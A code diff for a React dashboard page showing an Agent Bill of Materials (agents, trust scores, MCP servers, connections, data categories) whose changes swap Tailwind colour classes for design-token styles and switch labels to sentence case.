-                <div className="p-2 bg-cyan-100 dark:bg-cyan-900/30 rounded-lg">
-                  <Link2 className="h-5 w-5 text-cyan-600 dark:text-cyan-400" />
+                <div className="p-2 bg-brand-soft rounded-lg">
+                  <Link2 className="h-5 w-5 text-brand-sky" />
                 </div>
                 <div>
-                  <p className="text-2xl font-bold text-cyan-600 dark:text-cyan-400">{abomData.summary.totalConnections}</p>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">Connections</p>
+                  <p className="text-2xl font-bold text-brand-sky">{abomData.summary.totalConnections}</p>
+                  <p className="text-xs text-ink-secondary">Connections</p>
                 </div>
               </div>
             </div>
-            <div className="bg-white dark:bg-gray-800 p-4 rounded-lg border border-gray-200 dark:border-gray-700">
+            <div className="glass p-4">
               <div className="flex items-center gap-3">
-                <div className="p-2 bg-orange-100 dark:bg-orange-900/30 rounded-lg">
-                  <Cpu className="h-5 w-5 text-orange-600 dark:text-orange-400" />
+                <div className="p-2 bg-warning-fill rounded-lg">
+                  <Cpu className="h-5 w-5 text-warning-text" />
                 </div>
                 <div>
-                  <p className="text-2xl font-bold text-orange-600 dark:text-orange-400">{abomData.summary.totalCapabilities}</p>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">Capabilities</p>
+                  <p className="text-2xl font-bold text-warning-text">{abomData.summary.totalCapabilities}</p>
+                  <p className="text-xs text-ink-secondary">Capabilities</p>
                 </div>
               </div>
             </div>
-            <div className="bg-white dark:bg-gray-800 p-4 rounded-lg border border-gray-200 dark:border-gray-700">
+            <div className="glass p-4">
               <div className="flex items-center gap-3">
-                <div className="p-2 bg-yellow-100 dark:bg-yellow-900/30 rounded-lg">
-                  <Database className="h-5 w-5 text-yellow-600 dark:text-yellow-400" />
+                <div className="p-2 bg-warning-fill rounded-lg">
+                  <Database className="h-5 w-5 text-warning-text" />
                 </div>
                 <div>
-                  <p className="text-2xl font-bold text-yellow-600 dark:text-yellow-400">{abomData.summary.dataCategories.length}</p>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">Data Categories</p>
+                  <p className="text-2xl font-bold text-warning-text">{abomData.summary.dataCategories.length}</p>
+                  <p className="text-xs text-ink-secondary">Data categories</p>
                 </div>
               </div>
             </div>
           </div>
 
           {/* Agents Inventory */}
-          <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
-            <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
-              <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2">
-                <Bot className="h-5 w-5 text-gray-500" />
-                Agents Inventory
-                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+          <div className="glass overflow-hidden">
+            <div className="px-6 py-4 border-b border-divider">
+              <h3 className="text-lg font-semibold text-ink flex items-center gap-2">
+                <Bot className="h-5 w-5 text-ink-secondary" />
+                Agents inventory
+                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {agents.length}
                 </span>
               </h3>
-              <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-sm text-ink-secondary">
                 All registered AI agents with their capabilities and data access permissions
               </p>
             </div>
             <div className="overflow-x-auto">
-              <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-                <thead className="bg-gray-50 dark:bg-gray-900">
+              <table className="min-w-full divide-y divide-divider">
+                <thead className="bg-glass-inset-gray">
                   <tr>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Agent</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Status</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Trust Score</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Capabilities</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Data Access</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Registered By</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Created</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Agent</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Status</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Trust score</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Capabilities</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Data access</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Registered by</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Created</th>
                   </tr>
                 </thead>
-                <tbody className="bg-white dark:bg-gray-800 divide-y divide-gray-200 dark:divide-gray-700">
+                <tbody className="divide-y divide-divider">
                   {agents.length === 0 ? (
                     <tr>
-                      <td colSpan={7} className="px-6 py-12 text-center text-gray-500 dark:text-gray-400">
+                      <td colSpan={7} className="px-6 py-12 text-center text-ink-secondary">
                         <Bot className="h-12 w-12 mx-auto mb-4 opacity-50" />
                         <p className="text-lg font-medium">No agents registered</p>
                         <p className="text-sm mt-1">Agents will appear here when registered with AIM</p>
@@ -1789,15 +1794,15 @@ function SupplyChainPage() {
                     paginatedAbomAgents.map((agent) => (
                       <tr
                         key={agent.id}
-                        className="hover:bg-gray-50 dark:hover:bg-gray-700/50 cursor-pointer"
+                        className="hover:bg-glass-inset-gray cursor-pointer"
                         onClick={() => setSelectedAgent(agent)}
                       >
                         <td className="px-6 py-4 whitespace-nowrap">
                           <div className="flex items-center">
-                            <Bot className="h-5 w-5 text-gray-400 mr-3" />
+                            <Bot className="h-5 w-5 text-ink-tertiary mr-3" />
                             <div>
-                              <div className="text-sm font-medium text-gray-900 dark:text-white">{agent.name}</div>
-                              <div className="text-xs text-gray-500 dark:text-gray-400">{agent.id.slice(0, 8)}...</div>
+                              <div className="text-sm font-medium text-ink">{agent.name}</div>
+                              <div className="text-xs text-ink-secondary">{agent.id.slice(0, 8)}...</div>
                             </div>
                           </div>
                         </td>
@@ -1810,30 +1815,30 @@ function SupplyChainPage() {
                         <td className="px-6 py-4">
                           <div className="flex flex-wrap gap-1">
                             {(agent.capabilities || []).slice(0, 3).map((cap, idx) => (
-                              <span key={idx} className="inline-flex items-center px-2 py-0.5 rounded text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300">
+                              <span key={idx} className="inline-flex items-center px-2 py-0.5 rounded text-xs font-medium bg-glass-inset-gray text-ink-body">
                                 {cap}
                               </span>
                             ))}
                             {(agent.capabilities || []).length > 3 && (
-                              <span className="text-xs text-gray-500">+{agent.capabilities.length - 3} more</span>
+                              <span className="text-xs text-ink-secondary">+{agent.capabilities.length - 3} more</span>
                             )}
                             {(!agent.capabilities || agent.capabilities.length === 0) && (
-                              <span className="text-xs text-gray-400">None declared</span>
+                              <span className="text-xs text-ink-tertiary">None declared</span>
                             )}
                           </div>
                         </td>
                         <td className="px-6 py-4">
                           <div className="flex flex-wrap gap-1">
                             {(agent.dataAccess || []).slice(0, 2).map((data, idx) => (
-                              <span key={idx} className="inline-flex items-center px-2 py-0.5 rounded text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300">
+                              <span key={idx} className="inline-flex items-center px-2 py-0.5 rounded text-xs font-medium bg-glass-inset-gray text-ink-body">
                                 {data}
                               </span>
                             ))}
                             {(agent.dataAccess || []).length > 2 && (
-                              <span className="text-xs text-gray-500">+{agent.dataAccess!.length - 2} more</span>
+                              <span className="text-xs text-ink-secondary">+{agent.dataAccess!.length - 2} more</span>
                             )}
                             {(!agent.dataAccess || agent.dataAccess.length === 0) && (
-                              <span className="text-xs text-gray-400">None</span>
+                              <span className="text-xs text-ink-tertiary">None</span>
                             )}
                           </div>
                         </td>
@@ -1841,33 +1846,33 @@ function SupplyChainPage() {
                           <div className="flex items-center gap-2">
                             <div className={`w-6 h-6 rounded-full flex items-center justify-center ${
                               agent.createdBySdkTokenId
-                                ? "bg-purple-100 dark:bg-purple-900/30"
+                                ? "bg-brand-soft"
                                 : agent.createdByApiKeyId
-                                  ? "bg-amber-100 dark:bg-amber-900/30"
-                                  : "bg-blue-100 dark:bg-blue-900/30"
+                                  ? "bg-warning-fill"
+                                  : "bg-brand-soft"
                             }`}>
                               {agent.createdBySdkTokenId ? (
-                                <Code className="h-3.5 w-3.5 text-purple-600 dark:text-purple-400" />
+                                <Code className="h-3.5 w-3.5 text-brand-indigo" />
                               ) : agent.createdByApiKeyId ? (
-                                <Key className="h-3.5 w-3.5 text-amber-600 dark:text-amber-400" />
+                                <Key className="h-3.5 w-3.5 text-warning-text" />
                               ) : (
-                                <User className="h-3.5 w-3.5 text-blue-600 dark:text-blue-400" />
+                                <User className="h-3.5 w-3.5 text-brand-text" />
                               )}
                             </div>
                             <div>
-                              <div className="text-sm text-gray-900 dark:text-white">
-                                {agent.createdByName || agent.createdByEmail || (agent.createdBySdkTokenId ? "SDK" : agent.createdByApiKeyId ? "API Key" : "Unknown")}
+                              <div className="text-sm text-ink">
+                                {agent.createdByName || agent.createdByEmail || (agent.createdBySdkTokenId ? "SDK" : agent.createdByApiKeyId ? "API key" : "Unknown")}
                               </div>
                               {agent.createdByEmail && agent.createdByName && (
-                                <div className="text-xs text-gray-500 dark:text-gray-400">{agent.createdByEmail}</div>
+                                <div className="text-xs text-ink-secondary">{agent.createdByEmail}</div>
                               )}
                               {!agent.createdByName && !agent.createdByEmail && agent.createdBySdkTokenId && (
-                                <div className="text-xs text-gray-500 dark:text-gray-400">via SDK Token</div>
+                                <div className="text-xs text-ink-secondary">via SDK token</div>
                               )}
                             </div>
                           </div>
                         </td>
-                        <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500 dark:text-gray-400">
+                        <td className="px-6 py-4 whitespace-nowrap text-sm text-ink-secondary">
                           {formatDateTime(agent.createdAt)}
                         </td>
                       </tr>
@@ -1878,25 +1883,25 @@ function SupplyChainPage() {
             </div>
             {/* Agents Pagination */}
             {agents.length > abomAgentPageSize && (
-              <div className="px-6 py-4 border-t border-gray-200 dark:border-gray-700 flex items-center justify-between">
-                <div className="text-sm text-gray-500 dark:text-gray-400">
+              <div className="px-6 py-4 border-t border-divider flex items-center justify-between">
+                <div className="text-sm text-ink-secondary">
                   Showing {((abomAgentPage - 1) * abomAgentPageSize) + 1} to {Math.min(abomAgentPage * abomAgentPageSize, agents.length)} of {agents.length} agents
                 </div>
                 <div className="flex items-center gap-2">
                   <button
                     onClick={() => setAbomAgentPage(p => Math.max(1, p - 1))}
                     disabled={abomAgentPage === 1}
-                    className="px-3 py-1.5 text-sm font-medium text-gray-700 dark:text-gray-300 bg-white dark:bg-gray-800 border border-gray-300 dark:border-gray-600 rounded-md hover:bg-gray-50 dark:hover:bg-gray-700 disabled:opacity-50 disabled:cursor-not-allowed"
+                    className="px-3 py-1.5 text-sm font-medium text-ink-body border border-stroke rounded-pill hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
                   >
                     Previous
                   </button>
-                  <span className="text-sm text-gray-600 dark:text-gray-400">
+                  <span className="text-sm text-ink-secondary">
                     Page {abomAgentPage} of {totalAbomAgentPages}
                   </span>
                   <button
                     onClick={() => setAbomAgentPage(p => Math.min(totalAbomAgentPages, p + 1))}
                     disabled={abomAgentPage === totalAbomAgentPages}
-                    className="px-3 py-1.5 text-sm font-medium text-gray-700 dark:text-gray-300 bg-white dark:bg-gray-800 border border-gray-300 dark:border-gray-600 rounded-md hover:bg-gray-50 dark:hover:bg-gray-700 disabled:opacity-50 disabled:cursor-not-allowed"
+                    className="px-3 py-1.5 text-sm font-medium text-ink-body border border-stroke rounded-pill hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
                   >
                     Next
                   </button>
@@ -1906,38 +1911,38 @@ function SupplyChainPage() {
           </div>
 
           {/* MCP Tools & Servers */}
-          <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
-            <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
-              <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2">
-                <Server className="h-5 w-5 text-gray-500" />
-                MCP Servers & Tools
-                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+          <div className="glass overflow-hidden">
+            <div className="px-6 py-4 border-b border-divider">
+              <h3 className="text-lg font-semibold text-ink flex items-center gap-2">
+                <Server className="h-5 w-5 text-ink-secondary" />
+                MCP servers & tools
+                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {mcpServers.length} servers
                 </span>
-                <span className="px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+                <span className="px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {abomData.summary.totalTools} tools
                 </span>
               </h3>
-              <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-sm text-ink-secondary">
                 All MCP servers discovered through agent attestations with their exposed tools
               </p>
             </div>
             <div className="overflow-x-auto">
-              <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-                <thead className="bg-gray-50 dark:bg-gray-900">
+              <table className="min-w-full divide-y divide-divider">
+                <thead className="bg-glass-inset-gray">
                   <tr>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Server</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">URL</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Status</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Tools</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Attestations</th>
-                    <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">Confidence</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Server</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">URL</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Status</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Tools</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Attestations</th>
+                    <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">Confidence</th>
                   </tr>
                 </thead>
-                <tbody className="bg-white dark:bg-gray-800 divide-y divide-gray-200 dark:divide-gray-700">
+                <tbody className="divide-y divide-divider">
                   {mcpServers.length === 0 ? (
                     <tr>
-                      <td colSpan={6} className="px-6 py-12 text-center text-gray-500 dark:text-gray-400">
+                      <td colSpan={6} className="px-6 py-12 text-center text-ink-secondary">
                         <Server className="h-12 w-12 mx-auto mb-4 opacity-50" />
                         <p className="text-lg font-medium">No MCP servers discovered</p>
                         <p className="text-sm mt-1">MCP servers will appear here when agents attest their usage</p>
@@ -1945,33 +1950,33 @@ function SupplyChainPage() {
                     </tr>
                   ) : (
                     paginatedAbomMcpServers.map((server) => (
-                      <tr key={server.id} className="hover:bg-gray-50 dark:hover:bg-gray-700/50">
+                      <tr key={server.id} className="hover:bg-glass-inset-gray">
                         <td className="px-6 py-4 whitespace-nowrap">
                           <div className="flex items-center">
-                            <Server className="h-5 w-5 text-gray-400 mr-3" />
-                            <div className="text-sm font-medium text-gray-900 dark:text-white">{server.name}</div>
+                            <Server className="h-5 w-5 text-ink-tertiary mr-3" />
+                            <div className="text-sm font-medium text-ink">{server.name}</div>
                           </div>
                         </td>
                         <td className="px-6 py-4">
-                          <div className="text-sm text-gray-500 dark:text-gray-400 truncate max-w-xs">{server.url}</div>
+                          <div className="text-sm text-ink-secondary truncate max-w-xs">{server.url}</div>
                         </td>
                         <td className="px-6 py-4 whitespace-nowrap">
                           <StatusBadge status={server.status} />
                         </td>
                         <td className="px-6 py-4 whitespace-nowrap">
                           <div className="flex items-center">
-                            <Wrench className="h-4 w-4 text-gray-400 mr-1" />
-                            <span className="text-sm text-gray-900 dark:text-white">{server.toolCount || 0}</span>
+                            <Wrench className="h-4 w-4 text-ink-tertiary mr-1" />
+                            <span className="text-sm text-ink">{server.toolCount || 0}</span>
                           </div>
                         </td>
-                        <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-900 dark:text-white">
+                        <td className="px-6 py-4 whitespace-nowrap text-sm text-ink">
                           {server.attestationCount || 0}
                         </td>
                         <td className="px-6 py-4 whitespace-nowrap">
                           {server.confidenceScore ? (
                             <ConfidenceScoreBadge score={server.confidenceScore} />
                           ) : (
-                            <span className="text-sm text-gray-400">N/A</span>
+                            <span className="text-sm text-ink-tertiary">N/A</span>
                           )}
                         </td>
                       </tr>
@@ -1982,25 +1987,25 @@ function SupplyChainPage() {
             </div>
             {/* MCP Servers Pagination */}
             {mcpServers.length > abomMcpPageSize && (
-              <div className="px-6 py-4 border-t border-gray-200 dark:border-gray-700 flex items-center justify-between">
-                <div className="text-sm text-gray-500 dark:text-gray-400">
+              <div className="px-6 py-4 border-t border-divider flex items-center justify-between">
+                <div className="text-sm text-ink-secondary">
                   Showing {((abomMcpPage - 1) * abomMcpPageSize) + 1} to {Math.min(abomMcpPage * abomMcpPageSize, mcpServers.length)} of {mcpServers.length} servers
                 </div>
                 <div className="flex items-center gap-2">
                   <button
                     onClick={() => setAbomMcpPage(p => Math.max(1, p - 1))}
                     disabled={abomMcpPage === 1}
-                    className="px-3 py-1.5 text-sm font-medium text-gray-700 dark:text-gray-300 bg-white dark:bg-gray-800 border border-gray-300 dark:border-gray-600 rounded-md hover:bg-gray-50 dark:hover:bg-gray-700 disabled:opacity-50 disabled:cursor-not-allowed"
+                    className="px-3 py-1.5 text-sm font-medium text-ink-body border border-stroke rounded-pill hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
                   >
                     Previous
                   </button>
-                  <span className="text-sm text-gray-600 dark:text-gray-400">
+                  <span className="text-sm text-ink-secondary">
                     Page {abomMcpPage} of {totalAbomMcpPages}
                   </span>
                   <button
                     onClick={() => setAbomMcpPage(p => Math.min(totalAbomMcpPages, p + 1))}
                     disabled={abomMcpPage === totalAbomMcpPages}
-                    className="px-3 py-1.5 text-sm font-medium text-gray-700 dark:text-gray-300 bg-white dark:bg-gray-800 border border-gray-300 dark:border-gray-600 rounded-md hover:bg-gray-50 dark:hover:bg-gray-700 disabled:opacity-50 disabled:cursor-not-allowed"
+                    className="px-3 py-1.5 text-sm font-medium text-ink-body border border-stroke rounded-pill hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
                   >
                     Next
                   </button>
@@ -2010,21 +2015,21 @@ function SupplyChainPage() {
           </div>
 
           {/* Agent-MCP Connections Map */}
-          <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
-            <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
-              <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2">
-                <Link2 className="h-5 w-5 text-gray-500" />
-                Agent-MCP Connection Map
-                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+          <div className="glass overflow-hidden">
+            <div className="px-6 py-4 border-b border-divider">
+              <h3 className="text-lg font-semibold text-ink flex items-center gap-2">
+                <Link2 className="h-5 w-5 text-ink-secondary" />
+                Agent-MCP connection map
+                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {connections.length} connections
                 </span>
               </h3>
-              <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-sm text-ink-secondary">
                 Observed connections between agents and MCP servers from attestation data
               </p>
             </div>
             {connections.length === 0 ? (
-              <div className="px-6 py-12 text-center text-gray-500 dark:text-gray-400">
+              <div className="px-6 py-12 text-center text-ink-secondary">
                 <Link2 className="h-12 w-12 mx-auto mb-4 opacity-50" />
                 <p className="text-lg font-medium">No connections observed</p>
                 <p className="text-sm mt-1">Connections will appear here when agents attest MCP server usage</p>
@@ -2034,36 +2039,36 @@ function SupplyChainPage() {
                 {connections.slice(0, 12).map((conn) => (
                   <div
                     key={conn.id}
-                    className="flex items-center gap-3 p-4 bg-gray-50 dark:bg-gray-900/50 rounded-lg border border-gray-200 dark:border-gray-700"
+                    className="flex items-center gap-3 p-4 rounded-inset bg-glass-inset-gray"
                   >
                     <div className="flex-1">
                       <div className="flex items-center gap-2">
-                        <Bot className="h-4 w-4 text-gray-500" />
-                        <span className="text-sm font-medium text-gray-900 dark:text-white truncate">
+                        <Bot className="h-4 w-4 text-ink-secondary" />
+                        <span className="text-sm font-medium text-ink truncate">
                           {conn.agentName}
                         </span>
                       </div>
                     </div>
-                    <ArrowRight className="h-4 w-4 text-gray-400 flex-shrink-0" />
+                    <ArrowRight className="h-4 w-4 text-ink-tertiary flex-shrink-0" />
                     <div className="flex-1">
                       <div className="flex items-center gap-2">
-                        <Server className="h-4 w-4 text-gray-500" />
-                        <span className="text-sm font-medium text-gray-900 dark:text-white truncate">
+                        <Server className="h-4 w-4 text-ink-secondary" />
+                        <span className="text-sm font-medium text-ink truncate">
                           {conn.mcpServerName}
                         </span>
                       </div>
                     </div>
                     <div className="flex-shrink-0">
                       {conn.isActive ? (
-                        <CheckCircle2 className="h-4 w-4 text-green-500" />
+                        <CheckCircle2 className="h-4 w-4 text-success-text" />
                       ) : (
-                        <XCircle className="h-4 w-4 text-gray-400" />
+                        <XCircle className="h-4 w-4 text-ink-tertiary" />
                       )}
                     </div>
                   </div>
                 ))}
                 {connections.length > 12 && (
-                  <div className="col-span-full text-center text-sm text-gray-500 dark:text-gray-400 py-2">
+                  <div className="col-span-full text-center text-sm text-ink-secondary py-2">
                     + {connections.length - 12} more connections
                   </div>
                 )}
@@ -2073,22 +2078,22 @@ function SupplyChainPage() {
 
           {/* Data Categories */}
           {abomData.summary.dataCategories.length > 0 && (
-            <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-6">
-              <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2 mb-4">
-                <Database className="h-5 w-5 text-gray-500" />
-                Data Access Categories
-                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+            <div className="glass p-6">
+              <h3 className="text-lg font-semibold text-ink flex items-center gap-2 mb-4">
+                <Database className="h-5 w-5 text-ink-secondary" />
+                Data access categories
+                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {abomData.summary.dataCategories.length} categories
                 </span>
               </h3>
-              <p className="text-sm text-gray-500 dark:text-gray-400 mb-4">
+              <p className="text-sm text-ink-secondary mb-4">
                 Types of sensitive data that agents in your organization have declared access to
               </p>
               <div className="flex flex-wrap gap-2">
                 {abomData.summary.dataCategories.map((cat, idx) => (
                   <span
                     key={idx}
-                    className="inline-flex items-center px-3 py-1.5 rounded-lg text-sm font-medium bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300"
+                    className="inline-flex items-center px-3 py-1.5 rounded-lg text-sm font-medium bg-glass-inset-gray text-ink-body"
                   >
                     <Database className="h-4 w-4 mr-2" />
                     {cat}
@@ -2099,16 +2104,16 @@ function SupplyChainPage() {
           )}
 
           {/* ABOM Notice */}
-          <div className="bg-gray-50 dark:bg-gray-900/50 rounded-lg p-4 border border-gray-200 dark:border-gray-700">
+          <div className="glass p-4">
             <div className="flex items-start gap-3">
-              <div className="p-2 bg-gray-100 dark:bg-gray-700 rounded-lg">
-                <Lock className="h-5 w-5 text-gray-600 dark:text-gray-400" />
+              <div className="p-2 bg-glass-inset-gray rounded-inset-sm">
+                <Lock className="h-5 w-5 text-ink-secondary" />
               </div>
               <div>
-                <h4 className="text-sm font-semibold text-gray-900 dark:text-gray-100">
-                  This ABOM is Read-Only
+                <h4 className="text-sm font-semibold text-ink">
+                  This ABOM is read-only
                 </h4>
-                <p className="text-sm text-gray-600 dark:text-gray-300 mt-1">
+                <p className="text-sm text-ink-secondary mt-1">
                   The Agent Bill of Materials is automatically generated from AIM observations and attestations.
                   It cannot be manually modified and represents the actual state of your agent ecosystem.
                   Use the Export button above to download this ABOM for compliance, security audits, or sharing with stakeholders.
@@ -2119,24 +2124,24 @@ function SupplyChainPage() {
 
           {/* Agent Detail Modal */}
           {selectedAgent && (
-            <div className="fixed inset-0 bg-black/50 dark:bg-black/70 flex items-center justify-center z-50 p-4">
-              <div className="bg-white dark:bg-gray-800 rounded-lg shadow-xl max-w-2xl w-full max-h-[90vh] overflow-hidden">
+            <div className="fixed inset-0 bg-black/50 backdrop-blur-sm flex items-center justify-center z-50 p-4">
+              <div className="glass-chrome max-w-2xl w-full max-h-[90vh] overflow-hidden">
                 {/* Modal Header */}
-                <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700 flex items-center justify-between">
+                <div className="px-6 py-4 border-b border-divider flex items-center justify-between">
                   <div className="flex items-center gap-3">
-                    <div className="p-2 bg-gray-100 dark:bg-gray-700 rounded-lg">
-                      <Bot className="h-6 w-6 text-gray-600 dark:text-gray-400" />
+                    <div className="p-2 bg-glass-inset-gray rounded-inset-sm">
+                      <Bot className="h-6 w-6 text-ink-secondary" />
                     </div>
                     <div>
-                      <h3 className="text-lg font-semibold text-gray-900 dark:text-white">{selectedAgent.name}</h3>
-                      <p className="text-sm text-gray-500 dark:text-gray-400">Agent ABOM Details</p>
+                      <h3 className="text-lg font-semibold text-ink">{selectedAgent.name}</h3>
+                      <p className="text-sm text-ink-secondary">Agent ABOM details</p>
                     </div>
                   </div>
                   <button
                     onClick={() => setSelectedAgent(null)}
-                    className="p-2 hover:bg-gray-100 dark:hover:bg-gray-700 rounded-lg transition-colors"
+                    className="p-2 hover:bg-glass-inset-gray rounded-inset-sm transition-colors"
                   >
-                    <X className="h-5 w-5 text-gray-500" />
+                    <X className="h-5 w-5 text-ink-secondary" />
                   </button>
                 </div>
 
@@ -2146,52 +2151,52 @@ function SupplyChainPage() {
                     {/* Agent Info */}
                     <div className="grid grid-cols-2 gap-4">
                       <div>
-                        <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Agent ID</p>
-                        <p className="text-sm font-mono text-gray-900 dark:text-white mt-1">{selectedAgent.id}</p>
+                        <p className="text-xs font-medium text-ink-secondary uppercase">Agent ID</p>
+                        <p className="text-sm font-mono text-ink mt-1">{selectedAgent.id}</p>
                       </div>
                       <div>
-                        <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Status</p>
+                        <p className="text-xs font-medium text-ink-secondary uppercase">Status</p>
                         <div className="mt-1">
                           <StatusBadge status={selectedAgent.status} />
                         </div>
                       </div>
                       <div>
-                        <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Trust Score</p>
+                        <p className="text-xs font-medium text-ink-secondary uppercase">Trust score</p>
                         <div className="mt-1">
                           <ConfidenceScoreBadge score={selectedAgent.trustScore * 100} />
                         </div>
                       </div>
                       <div>
-                        <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Created</p>
-                        <p className="text-sm text-gray-900 dark:text-white mt-1">{formatDateTime(selectedAgent.createdAt)}</p>
+                        <p className="text-xs font-medium text-ink-secondary uppercase">Created</p>
+                        <p className="text-sm text-ink mt-1">{formatDateTime(selectedAgent.createdAt)}</p>
                       </div>
                       <div className="col-span-2">
-                        <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Registered By</p>
+                        <p className="text-xs font-medium text-ink-secondary uppercase">Registered by</p>
                         <div className="mt-1 flex items-center gap-2">
                           <div className={`w-6 h-6 rounded-full flex items-center justify-center ${
                             selectedAgent.createdBySdkTokenId
-                              ? "bg-purple-100 dark:bg-purple-900/30"
+                              ? "bg-brand-soft"
                               : selectedAgent.createdByApiKeyId
-                                ? "bg-amber-100 dark:bg-amber-900/30"
-                                : "bg-blue-100 dark:bg-blue-900/30"
+                                ? "bg-warning-fill"
+                                : "bg-brand-soft"
                           }`}>
                             {selectedAgent.createdBySdkTokenId ? (
-                              <Code className="h-3.5 w-3.5 text-purple-600 dark:text-purple-400" />
+                              <Code className="h-3.5 w-3.5 text-brand-indigo" />
                             ) : selectedAgent.createdByApiKeyId ? (
-                              <Key className="h-3.5 w-3.5 text-amber-600 dark:text-amber-400" />
+                              <Key className="h-3.5 w-3.5 text-warning-text" />
                             ) : (
-                              <User className="h-3.5 w-3.5 text-blue-600 dark:text-blue-400" />
+                              <User className="h-3.5 w-3.5 text-brand-text" />
                             )}
                           </div>
                           <div>
-                            <p className="text-sm text-gray-900 dark:text-white">
